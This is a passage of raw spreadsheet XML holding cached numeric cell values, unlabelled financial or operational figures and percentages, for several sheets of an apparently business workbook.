            <v>-2.00088834390044e-11</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>4563.23999999998</v>
          </cell>
          <cell r="N16">
            <v>603</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1500.24</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>3747.99999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>446.366</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>3877.634</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>4311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4799.24</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>25</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>302.097</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>368.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>306</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>4124.74</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>24163.22</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9606.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="26">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>3829</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>33887.2099999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>9.25</v>
          </cell>
          <cell r="M6">
            <v>350.08</v>
          </cell>
          <cell r="N6">
            <v>4544</v>
          </cell>
          <cell r="O6">
            <v>38.5416666666667</v>
          </cell>
          <cell r="P6">
            <v>58.3466666666667</v>
          </cell>
          <cell r="Q6">
            <v>52.7390900649954</v>
          </cell>
          <cell r="R6">
            <v>79.8918918918919</v>
          </cell>
          <cell r="S6">
            <v>85.0319926873857</v>
          </cell>
          <cell r="T6">
            <v>86.0739436619718</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>16.25</v>
          </cell>
          <cell r="M7">
            <v>339</v>
          </cell>
          <cell r="N7">
            <v>4361.58</v>
          </cell>
          <cell r="O7">
            <v>67.7083333333333</v>
          </cell>
          <cell r="P7">
            <v>56.5</v>
          </cell>
          <cell r="Q7">
            <v>50.6218662952646</v>
          </cell>
          <cell r="R7">
            <v>190.153846153846</v>
          </cell>
          <cell r="S7">
            <v>192.802359882006</v>
          </cell>
          <cell r="T7">
            <v>187.977980456624</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>739</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>100</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>1230</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>1005</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>200</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3831.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>251</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>4694.19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1943</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1100</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>4590.99999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>1195</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>2682.634</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>3090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3711.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>44.16</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>26</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>320.257</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>178.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>118</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3415</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>24398.72</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9488.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="27">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>3176</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>33853.6999999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>24</v>
          </cell>
          <cell r="M6">
            <v>374.08</v>
          </cell>
          <cell r="N6">
            <v>4568</v>
          </cell>
          <cell r="O6">
            <v>100</v>
          </cell>
          <cell r="P6">
            <v>59.9487179487179</v>
          </cell>
          <cell r="Q6">
            <v>52.8703703703704</v>
          </cell>
          <cell r="R6">
            <v>77.2916666666667</v>
          </cell>
          <cell r="S6">
            <v>84.5353934987169</v>
          </cell>
          <cell r="T6">
            <v>86.0278021015762</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>9.75</v>
          </cell>
          <cell r="M7">
            <v>348.75</v>
          </cell>
          <cell r="N7">
            <v>4371.33</v>
          </cell>
          <cell r="O7">
            <v>40.625</v>
          </cell>
          <cell r="P7">
            <v>55.8894230769231</v>
          </cell>
          <cell r="Q7">
            <v>50.5940972222222</v>
          </cell>
          <cell r="R7">
            <v>135.487179487179</v>
          </cell>
          <cell r="S7">
            <v>191.2</v>
          </cell>
          <cell r="T7">
            <v>187.860902745846</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1855</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>1000</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>230</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>100</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3731.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>335</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>236</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>4793.19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2010</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>500</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>6100.99999999998</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>1005</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>451</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>3236.634</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>1321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3209.51</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>42.85</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>34</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>329.107</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>318.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>346.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>2544.51</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>24711.71</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>9141.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="28">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>4595</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>33989.0899999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>24</v>
          </cell>
          <cell r="M6">
            <v>398.08</v>
          </cell>
          <cell r="N6">
            <v>4592</v>
          </cell>
          <cell r="O6">
            <v>100</v>
          </cell>
          <cell r="P6">
            <v>61.4320987654321</v>
          </cell>
          <cell r="Q6">
            <v>53.0009233610342</v>
          </cell>
          <cell r="R6">
            <v>75</v>
          </cell>
          <cell r="S6">
            <v>83.9605104501608</v>
          </cell>
          <cell r="T6">
            <v>85.9701655052265</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>16.25</v>
          </cell>
          <cell r="M7">
            <v>365</v>
          </cell>
          <cell r="N7">
            <v>4387.58</v>
          </cell>
          <cell r="O7">
            <v>67.7083333333333</v>
          </cell>
          <cell r="P7">
            <v>56.3271604938272</v>
          </cell>
          <cell r="Q7">
            <v>50.6415050784857</v>
          </cell>
          <cell r="R7">
            <v>172</v>
          </cell>
          <cell r="S7">
            <v>190.345205479452</v>
          </cell>
          <cell r="T7">
            <v>187.8021597327</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1800</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>230</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>500</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3231.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>938</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>566</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>5165.19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737</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1000</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>5837.99999999997</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>938</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>1012</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>3162.634</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>2795</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4459.61</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>123.95</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>46</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>407.057</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>387</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>466.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3606.11</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>25313.6</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>8675.49</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="29">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>6064</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>35727.4299999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>24</v>
          </cell>
          <cell r="M6">
            <v>422.08</v>
          </cell>
          <cell r="N6">
            <v>4616</v>
          </cell>
          <cell r="O6">
            <v>100</v>
          </cell>
          <cell r="P6">
            <v>62.8095238095238</v>
          </cell>
          <cell r="Q6">
            <v>53.1307550644567</v>
          </cell>
          <cell r="R6">
            <v>82.0833333333333</v>
          </cell>
          <cell r="S6">
            <v>83.8537717968158</v>
          </cell>
          <cell r="T6">
            <v>85.9499566724437</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>24</v>
          </cell>
          <cell r="M7">
            <v>389</v>
          </cell>
          <cell r="N7">
            <v>4411.58</v>
          </cell>
          <cell r="O7">
            <v>100</v>
          </cell>
          <cell r="P7">
            <v>57.8869047619048</v>
          </cell>
          <cell r="Q7">
            <v>50.7778545119705</v>
          </cell>
          <cell r="R7">
            <v>170.583333333333</v>
          </cell>
          <cell r="S7">
            <v>189.125964010283</v>
          </cell>
          <cell r="T7">
            <v>187.708485395255</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1970</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>804</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>700</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>3335.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="M13">
            <v>4617.19</v>
          </cell>
          <cell r="N13">
            <v>469</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Q13">
            <v>718</v>
          </cell>
        </row>
        <row r="13">
          <cell r="T13">
            <v>4916.19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938</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>1500</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>5275.99999999997</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>0</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>2534.71</v>
          </cell>
          <cell r="N17">
            <v>670</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>1448</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>2384.634</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>16144.5599999999</v>
          </cell>
          <cell r="E18">
            <v>4094</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4325.66</v>
          </cell>
        </row>
        <row r="21">
          <cell r="M21">
            <v>117.547</v>
          </cell>
          <cell r="N21">
            <v>42.62</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Q21">
            <v>109</v>
          </cell>
        </row>
        <row r="21">
          <cell r="T21">
            <v>340.677</v>
          </cell>
        </row>
        <row r="22">
          <cell r="M22">
            <v>1531.4</v>
          </cell>
          <cell r="N22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Q22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="T22">
            <v>1531.4</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="H23">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="H25">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="E26">
            <v>346.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="H26">
            <v>0</v>
          </cell>
        </row>
        <row r="27">
          <cell r="E27">
            <v>417.5</v>
          </cell>
        </row>
        <row r="27">
          <cell r="H27">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="H28">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="E30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="H30">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="E32">
            <v>0</v>
          </cell>
        </row>
        <row r="32">
          <cell r="H32">
            <v>0</v>
          </cell>
        </row>
        <row r="33">
          <cell r="E33">
            <v>3561.66</v>
          </cell>
        </row>
        <row r="33">
          <cell r="H33">
            <v>27469.44</v>
          </cell>
        </row>
        <row r="34">
          <cell r="E34">
            <v>0</v>
          </cell>
        </row>
        <row r="34">
          <cell r="H34">
            <v>8257.99</v>
          </cell>
        </row>
        <row r="35">
          <cell r="E35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="H35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="M35">
            <v>0</v>
          </cell>
          <cell r="N35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="Q35">
            <v>0</v>
          </cell>
        </row>
        <row r="35">
          <cell r="T35">
            <v>0</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="30">
        <row r="6">
          <cell r="D6">
            <v>37769.1699999999</v>
          </cell>
          <cell r="E6">
            <v>3749</v>
          </cell>
        </row>
        <row r="6">
          <cell r="H6">
            <v>35621.8199999999</v>
          </cell>
        </row>
        <row r="6">
          <cell r="L6">
            <v>24</v>
          </cell>
          <cell r="M6">
            <v>446.08</v>
          </cell>
          <cell r="N6">
            <v>4640</v>
          </cell>
          <cell r="O6">
            <v>100</v>
          </cell>
          <cell r="P6">
            <v>64.0919540229885</v>
          </cell>
          <cell r="Q6">
            <v>53.2598714416896</v>
          </cell>
          <cell r="R6">
            <v>78.25</v>
          </cell>
          <cell r="S6">
            <v>83.5522776183644</v>
          </cell>
          <cell r="T6">
            <v>85.9101293103448</v>
          </cell>
        </row>
        <row r="7">
          <cell r="L7">
            <v>10.5</v>
          </cell>
          <cell r="M7">
            <v>399.5</v>
          </cell>
          <cell r="N7">
            <v>4422.08</v>
          </cell>
          <cell r="O7">
            <v>43.75</v>
          </cell>
          <cell r="P7">
            <v>57.3994252873563</v>
          </cell>
          <cell r="Q7">
            <v>50.7584940312213</v>
          </cell>
          <cell r="R7">
            <v>178.190476190476</v>
          </cell>
          <cell r="S7">
            <v>188.838548185232</v>
          </cell>
          <cell r="T7">
            <v>187.685885375208</v>
          </cell>
        </row>
        <row r="8">
          <cell r="D8">
            <v>0</v>
          </cell>
          <cell r="E8">
            <v>0</v>
          </cell>
        </row>
        <row r="10">
          <cell r="D10">
            <v>0</v>
          </cell>
          <cell r="E10">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="D11">
            <v>11672.12</v>
          </cell>
          <cell r="E11">
            <v>1878</v>
          </cell>
        </row>
        <row r="11">
          <cell r="M11">
            <v>602</v>
          </cell>
          <cell r="N11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Q11">
            <v>0</v>
          </cell>
        </row>
        <row r="11">
          <cell r="T11">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="D12">
            <v>9952.49</v>
          </cell>
          <cell r="E12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="M12">
            <v>3099.81</v>
          </cell>
          <cell r="N12">
            <v>0</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Q12">
            <v>353</v>
          </cell>
        </row>
        <row r="12">
          <cell r="T12">
            <v>2982.81</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>0</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
